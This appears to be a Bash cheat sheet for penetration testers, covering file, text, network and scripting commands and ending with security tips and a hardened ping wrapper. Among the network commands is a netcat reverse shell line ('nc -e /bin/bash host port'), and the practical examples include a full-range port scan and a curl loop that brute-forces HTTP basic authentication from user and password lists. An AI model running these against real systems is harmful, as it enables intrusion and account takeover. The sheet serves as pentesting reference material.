Bash
Bash (Bourne Again SHell) is a powerful command-line interface and scripting language used widely in UNIX-like operating systems. It is essential for security professionals and penetration testers to harness the full potential of Bash for tasks such as automation, information gathering, and exploitation. This cheat sheet provides quick references and examples for using Bash effectively.
Basic Commands
File and Directory Operations
List files and directories:
ls
Change directory:
cd /path/to/directory
Create a directory:
mkdir /path/to/directory
Remove a directory:
rmdir /path/to/directory
Copy files:
cp /path/to/source /path/to/destination
Move/Rename files:
mv /path/to/source /path/to/destination
Delete files:
rm /path/to/file
File Content Operations
View file content:
cat /path/to/file
View file content page by page:
less /path/to/file
Search inside files:
grep 'search_term' /path/to/file
Count lines, words, and characters in a file:
wc /path/to/file
Permissions
Change file permissions:
chmod 755 /path/to/file
Change file ownership:
chown user:group /path/to/file
Text Processing
awk
Print the first column:
awk '{print $1}' file
Print specific columns:
awk '{print $1, $3}' file
Pattern matching and printing:
awk '/pattern/ {print $1}' file
sed
Substitute text in a file:
sed 's/old/new/g' file
Delete lines matching a pattern:
sed '/pattern/d' file
grep
Search for a pattern in files:
grep 'pattern' file
Recursive search in directories:
grep -r 'pattern' /path/to/directory
cut
Extract columns:
cut -d':' -f1 /etc/passwd
sort
Sort lines in a file:
sort file
uniq
Remove duplicate lines (uniq only collapses adjacent duplicates, so sort first):
sort file | uniq
tr
Translate or delete characters:
tr 'a-z' 'A-Z' < file
Network Operations
Network Scanning
Ping a host:
ping -c 4 host
Scan open ports with netcat:
nc -zv host 1-65535
Network enumeration with nmap:
nmap -A host
File Transfers
Download a file with wget:
wget http://example.com/file
Upload a file with curl:
curl -T file ftp://example.com/
Network Connections
Establish a TCP connection:
nc host port
Open a reverse shell:
nc -e /bin/bash host port
System Monitoring
Process Management
List running processes:
ps aux
Terminate a process:
kill PID
Force terminate a process:
kill -9 PID
Disk Usage
Check disk space usage:
df -h
Check directory size:
du -sh /path/to/directory
Memory Usage
Check memory usage:
free -h
Scripting Essentials
Variables
Define a variable:
VAR_NAME="value"
Access a variable:
echo "$VAR_NAME"
Conditionals
if [ condition ]; then
    # commands
elif [ condition ]; then
    # commands
else
    # commands
fi
Loops
For loop:
for item in list; do
    # commands
done
While loop:
while [ condition ]; do
    # commands
done
Functions
function_name() {
    # commands
}
Practical Examples
Basic Port Scan
#!/bin/bash
for port in {1..65535}; do
    timeout 1 bash -c "echo > /dev/tcp/127.0.0.1/$port" 2>/dev/null && echo "Port $port is open"
done
Directory Backup
#!/bin/bash
SOURCE="/path/to/source"
DEST="/path/to/destination/backup-$(date +%F).tar.gz"
# Quote the variables so paths containing spaces are passed as single arguments
tar -czvf "$DEST" "$SOURCE"
Log Parsing
#!/bin/bash
grep "ERROR" /var/log/syslog | awk '{print $1, $2, $5}'
Basic Authentication Brute Force
#!/bin/bash
for user in $(cat users.txt); do
    for pass in $(cat passwords.txt); do
        response=$(curl -s -o /dev/null -w "%{http_code}" -u "$user:$pass" http://target)
        if [ "$response" -eq 200 ]; then
            echo "Valid credentials: $user:$pass"
        fi
    done
done
Security Tips
Use absolute paths in scripts to avoid unexpected behaviors.
Validate inputs to prevent injection attacks.
Limit permissions and use sudo sparingly.
Log and monitor script activities.
Encrypt sensitive data in scripts.
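The tips above applied to the sheet's `ping -c 4 host` command, as an added example that is not part of the original cheat sheet. The function names, `PING_BIN` and `LOG_FILE` are assumptions chosen for illustration.

```bash
#!/bin/bash
# Added example: hardened wrapper around the sheet's `ping -c 4 host`.
# All names and paths below are assumptions made for illustration.
LC_ALL=C; export LC_ALL                  # make A-Z / a-z ranges byte-exact
PING_BIN=/bin/ping                       # absolute path (assumed location)
LOG_FILE="${LOG_FILE:-/var/log/safe_ping.log}"   # hypothetical log file

# Validate input: allow only letters, digits, dots and hyphens.
# Rejects empty values, a leading "-" (would be parsed as an option),
# a leading "." or "..", and every shell metacharacter.
valid_host() {
    case "$1" in
        ''|-*|.*|*..*|*[!A-Za-z0-9.-]*) return 1 ;;
    esac
    [ "${#1}" -le 253 ]                  # maximum DNS name length
}

# Log and monitor: one timestamped line per action.
log_action() {
    printf '%s uid=%s %s\n' "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$(id -u)" "$*" >> "$LOG_FILE"
}

safe_ping() {
    if ! valid_host "$1"; then
        # Record the length, not the raw value, so a hostile argument
        # cannot forge or split log lines.
        log_action "REJECTED host argument len=${#1}"
        return 2
    fi
    log_action "ping host=$1"
    "$PING_BIN" -c 4 -- "$1"             # quoted, and "--" ends option parsing
}

# Run only when the script is given an argument.
if [ "$#" -gt 0 ]; then
    safe_ping "$1"
fi
```

Point `LOG_FILE` at a location the script's user can append to but not rewrite, so the log stays useful for monitoring.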